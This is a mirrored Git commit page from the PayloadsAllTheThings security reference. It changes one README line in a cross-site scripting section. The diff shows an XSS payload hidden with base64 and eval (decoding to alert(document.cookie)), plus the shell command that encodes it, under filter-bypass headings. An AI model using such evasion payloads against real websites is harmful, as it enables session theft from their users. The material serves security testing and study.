mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 14:22:47 +00:00
Update README.md
This commit is contained in:
parent
6c7df7dc4e
commit
e9eac5ca59
1 changed files with 1 additions and 1 deletions
|
@ -667,7 +667,7 @@ http://www.geektools.com/cgi-bin/ipconv.cgi
|
|||
<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
|
||||
```
|
||||
|
||||
Base64 encoding your XSS payload with linux command: echo -n "alert(document.cookie)" | base64
|
||||
Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
|
||||
|
||||
### Bypass parenthesis for string
|
||||
|
||||
|
|
Loading…
Reference in a new issue